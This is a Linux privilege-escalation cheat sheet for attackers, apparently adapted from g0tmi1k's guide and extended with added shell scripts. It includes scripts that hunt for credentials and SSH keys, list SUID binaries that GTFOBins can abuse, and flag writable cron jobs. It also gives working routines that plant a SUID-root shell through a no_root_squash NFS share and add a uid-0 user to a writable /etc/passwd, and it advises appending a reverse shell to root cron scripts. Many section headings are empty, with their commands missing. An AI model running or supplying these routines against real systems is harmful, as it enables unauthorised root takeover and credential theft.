Privilege Escalation
Based on g0tmi1k's Basic Linux Privilege Escalation guide + additional field notes.
Step 1: Upgrade Your Shell
Make your shell more stable & interactive:
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
# Background and fix terminal
Ctrl + Z
stty raw -echo; fg; reset
stty columns 200 rows 200
Step 2: Enumeration – System Context
Capabilities & Tooling
which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socat
Compilation / System Info
Arch & Kernel
Step 3: User Context
Are we a real user?
Users & homes:
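The tooling, kernel and user checks in Steps 2 and 3 can be collapsed into one read-only script. The one below is an added example, not part of the original notes; the tool list mirrors the which commands above, and the user filter (uid 0 or uid >= 1000 with a real login shell) is my own heuristic for "real" users.

```shell
#!/bin/sh
# Added example: system and user context enumeration. Read-only, safe to run
# as an unprivileged user. Default tool list mirrors the which checks above.

TOOLS="gcc cc python python3 perl wget curl fetch nc ncat nc.traditional socat"

# Print each tool (from the arguments, or TOOLS by default) that exists on PATH.
available_tools() {
    list="${*:-$TOOLS}"
    for t in $list; do
        command -v "$t" >/dev/null 2>&1 && echo "$t"
    done
    return 0
}

# Architecture, kernel and distro: needed to match kernel/glibc exploits and
# to know whether binaries built elsewhere will run here.
system_info() {
    uname -a
    [ -r /etc/os-release ] && grep '^PRETTY_NAME=' /etc/os-release
    [ -r /proc/version ] && cat /proc/version
    return 0
}

# Users with a real login shell, from a passwd file (default /etc/passwd).
# Prints name:uid:home:shell. Root and ordinary users (uid >= 1000) are the
# interesting ones; service accounts on nologin/false are skipped.
real_users() {
    passwd_file="${1:-/etc/passwd}"
    awk -F: '($3 == 0 || $3 >= 1000) && $7 !~ /(nologin|false)$/ {
        print $1 ":" $3 ":" $6 ":" $7
    }' "$passwd_file"
}

# Who we are and what sudo gives us without a password (-n never prompts).
whoami_context() {
    id
    sudo -n -l 2>/dev/null || echo "sudo: no passwordless rights (or sudo absent)"
    return 0
}

echo "== tools ==";   available_tools
echo "== system ==";  system_info
echo "== users ==";   real_users
echo "== identity =="; whoami_context
```

Home directories listed by real_users are the next place to look (history files, .ssh, dotfiles); an unreadable home with a readable .ssh is still worth noting.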
Step 4: Credentials & Configs
Check for web creds:
Check /etc/ for unusual configs:
SSH keys:
Other dirs of interest:
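A concrete way to run the Step 4 credential checks over a tree (web roots, /etc, /opt, homes). Added example, not from the original notes: the key-name regex and the list of "usually holds secrets" filenames are my own choices, and -readable is a GNU find option.

```shell
#!/bin/sh
# Added example: hunt for credentials in config files under a directory tree.

# Lines that look like credential assignments (password=, secret:, api_key=, ...).
# -I skips binaries; VCS and dependency dirs are excluded to cut noise.
find_creds() {
    dir="${1:-/var/www}"
    grep -rIinE '(passw(or)?d|db_pass|secret|api[_-]?key|token)[[:space:]]*[=:]' \
        --exclude-dir=.git --exclude-dir=node_modules "$dir" 2>/dev/null
    return 0
}

# Readable files whose names usually carry secrets (web app configs, .env,
# htpasswd, private keys, shell history). Names chosen for this example.
find_cred_files() {
    root="${1:-/}"
    find "$root" -type f -readable \( -name '*.conf' -o -name '*.ini' -o -name '.env' \
        -o -name 'wp-config.php' -o -name 'config.php' -o -name '.htpasswd' \
        -o -name 'id_rsa' -o -name 'id_ed25519' -o -name '.bash_history' \) 2>/dev/null
    return 0
}

# Typical sweep: web roots and /etc for assignments, the whole tree for files.
for d in /var/www /etc /opt; do
    [ -d "$d" ] && find_creds "$d"
done
find_cred_files /home
```

Anything found here feeds Step 7 (database logins) and password reuse against su/sudo/SSH for the users found in Step 3.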
Step 5: Escalation Primitives
SUID / SGID
Check exploitation paths: GTFOBins
File Capabilities
Reference: Linux File Capabilities
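Step 5 in script form: list SUID/SGID binaries, pull out the ones whose names are known GTFOBins entries, and dump file capabilities. Added example, not part of the original notes; the KNOWN list is a small hand-picked subset of GTFOBins SUID entries, not the full list, and getcap is only run if present.

```shell
#!/bin/sh
# Added example: SUID/SGID and file-capability enumeration.

# Subset of binaries with a GTFOBins SUID entry (hand-picked for this example).
KNOWN="bash sh dash find vim vi nmap python python3 perl env less more cp mv awk gawk tar"

# Paths of SUID (-4000) or SGID (-2000) regular files under a root.
# -xdev keeps find on one filesystem so /proc and network mounts are skipped.
find_suid_sgid() {
    root="${1:-/}"
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
    return 0
}

# Filter stdin (one path per line) down to basenames in KNOWN.
interesting_suid() {
    while read -r p; do
        b=$(basename "$p")
        for k in $KNOWN; do
            [ "$b" = "$k" ] && { echo "$p"; break; }
        done
    done
    return 0
}

# File capabilities: cap_setuid, cap_dac_read_search, cap_sys_admin and
# cap_sys_ptrace on a binary you can run are the ones that lead somewhere.
find_caps() {
    root="${1:-/}"
    command -v getcap >/dev/null 2>&1 || { echo "getcap not installed" >&2; return 0; }
    getcap -r "$root" 2>/dev/null
    return 0
}

echo "== all SUID/SGID =="
find_suid_sgid / | while read -r p; do ls -ld "$p"; done
echo "== GTFOBins candidates =="
find_suid_sgid / | interesting_suid
echo "== capabilities =="
find_caps /
```

Anything not in the distro's default set (compare against a clean install of the same release) deserves a look even if it is not in KNOWN: custom SUID helpers are where the real bugs live.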
Step 6: Process & Cron Monitoring
Running Processes
Network
Cron Jobs
Process Monitoring (pspy)
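The Step 6 cron check that matters most is whether any job runs something you can modify. The script below is an added example, not from the original notes: it parses system-format crontabs (five time fields, user, command) and flags commands whose program file is writable, or missing from a writable directory. Wildcard injection in cron commands is a separate primitive and is not covered here.

```shell
#!/bin/sh
# Added example: flag cron jobs whose program the current user can tamper with.
# Handles system crontab format (/etc/crontab, /etc/cron.d/*): time fields, user, command.
# Per-user crontabs in /var/spool/cron have no user field and are not parsed here.

# Print "user command" for every job line in the given crontab files.
cron_jobs() {
    for f in "$@"; do
        [ -r "$f" ] || continue
        # drop comments, blank lines and VAR=value lines, then strip the schedule
        # (5 fields, or 1 for @reboot/@daily style entries)
        grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$f" |
            awk '{ n = ($1 ~ /^@/) ? 1 : 5; for (i = 1; i <= n; i++) $i = ""; sub(/^ +/, ""); print }'
    done
    return 0
}

# For each job the first word of the command is the program. Report it if we
# can write to it, or if it does not exist but its directory is writable
# (we can create it). Relative commands are skipped: their resolution
# depends on cron's PATH and is ambiguous.
writable_cron_targets() {
    cron_jobs "$@" | while read -r user cmd; do
        prog="${cmd%% *}"
        case "$prog" in /*) ;; *) continue ;; esac
        if [ -w "$prog" ]; then
            echo "WRITABLE $user $prog"
        elif [ ! -e "$prog" ] && [ -w "$(dirname "$prog")" ]; then
            echo "MISSING-IN-WRITABLE-DIR $user $prog"
        fi
    done
    return 0
}

echo "== jobs =="
cron_jobs /etc/crontab /etc/cron.d/*
echo "== tamperable =="
writable_cron_targets /etc/crontab /etc/cron.d/*
```

A WRITABLE hit on a job running as root is a clean path: append a reverse shell or a chmod u+s /bin/bash to the script and wait for the schedule. pspy confirms the job actually fires and shows jobs that live outside these files.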
Step 7: Databases
Check for MySQL root creds:
Step 8: File Transfers
Check what’s available:
Step 9: NFS
Check for exports:
👉 Look for no_root_squash → Attacking NFS Shares
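The no_root_squash check from Step 9, as an added example (not part of the original notes): it parses an exports file locally and shows the follow-up from the attacking machine. The share path, mount point and target address in plant_suid_shell are placeholders for whatever showmount -e reports.

```shell
#!/bin/sh
# Added example: find NFS exports that keep root's uid (no_root_squash).

# Print export lines that contain no_root_squash. With it set, a client that is
# root locally writes files owned by uid 0 on the server, so a SUID binary
# dropped on the share is SUID root on the server.
no_root_squash_exports() {
    f="${1:-/etc/exports}"
    [ -r "$f" ] || return 0
    grep -Ev '^[[:space:]]*(#|$)' "$f" | grep -w no_root_squash
    return 0
}

# Remote side (run as root on the attacking machine). Assumed placeholders:
#   $1 = target, $2 = exported path, $3 = local mount point.
plant_suid_shell() {
    target="$1"; share="$2"; mnt="${3:-/mnt/nfs}"
    mkdir -p "$mnt"
    mount -t nfs "$target:$share" "$mnt"
    cp /bin/bash "$mnt/rootbash"        # copy a shell onto the share as uid 0
    chmod 4755 "$mnt/rootbash"          # SUID bit survives because root is not squashed
    umount "$mnt"
    echo "on the target: $share/rootbash -p"
}

echo "== local exports with no_root_squash =="
no_root_squash_exports /etc/exports
echo "== remote check: showmount -e <target>"
```

The copied bash must match the target's architecture and libc; when it does not, compile a small setuid(0)/execve("/bin/sh") wrapper on the target (Step 2 tells you whether gcc is there) and place that on the share instead.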
Step 10: Persistence / Living on Host
Writable locations:
/var/tmp/
/tmp/
/dev/shm/
Check mounts:
Step 11: Local Port Forwards
If vulnerable services are only on 127.0.0.1:
Use meterpreter port forwarding (portfwd add -l LOCALPORT -p REMOTEPORT -r 127.0.0.1) or, with SSH access, a local forward from the attacker side (ssh -L LOCALPORT:127.0.0.1:REMOTEPORT user@target).
Step 12: Direct Root via /etc/passwd
If /etc/passwd is writable:
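Step 12 worked through, as an added example that is not part of the original notes. The hash goes straight into field 2 of the new line, which takes precedence over the "x" placeholder that defers to /etc/shadow; the user name, salt and password are placeholders.

```shell
#!/bin/sh
# Added example: add a uid-0 user when /etc/passwd is writable.

# MD5-crypt ($1$) hash via openssl. glibc's crypt() still accepts it, and the
# -salt flag makes the output reproducible. Use -6 for sha512-crypt if preferred.
mkhash() {
    openssl passwd -1 -salt "${2:-xyz}" "$1"
}

# A passwd line for a uid-0 user with the hash inline in the password field.
root_entry() {
    name="$1"; hash="$2"
    printf '%s:%s:0:0:%s:/root:/bin/bash\n' "$name" "$hash" "$name"
}

# Append the entry if the file is writable; returns 1 without touching it otherwise.
add_root_user() {
    file="$1"; name="$2"; hash="$3"
    [ -w "$file" ] || { echo "$file is not writable" >&2; return 1; }
    root_entry "$name" "$hash" >> "$file"
}

# Dry run against a copy so nothing on the host changes while testing.
tmp=$(mktemp)
cp /etc/passwd "$tmp" 2>/dev/null || touch "$tmp"
add_root_user "$tmp" hax "$(mkhash password123 xyz 2>/dev/null || echo '$1$xyz$placeholder')"
tail -n 1 "$tmp"
rm -f "$tmp"
# Real thing (only when [ -w /etc/passwd ]):  add_root_user /etc/passwd hax "$(mkhash password123)"  then  su hax
```

Check with [ -w /etc/passwd ] first; a write to a non-writable file fails loudly and shows up in logs. The same trick works on /etc/shadow if that is writable instead (replace root's hash), and on /etc/sudoers if you can write there.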
Step 13: Miscellaneous
Mail:
Files by specific user (ex: bob):
Tools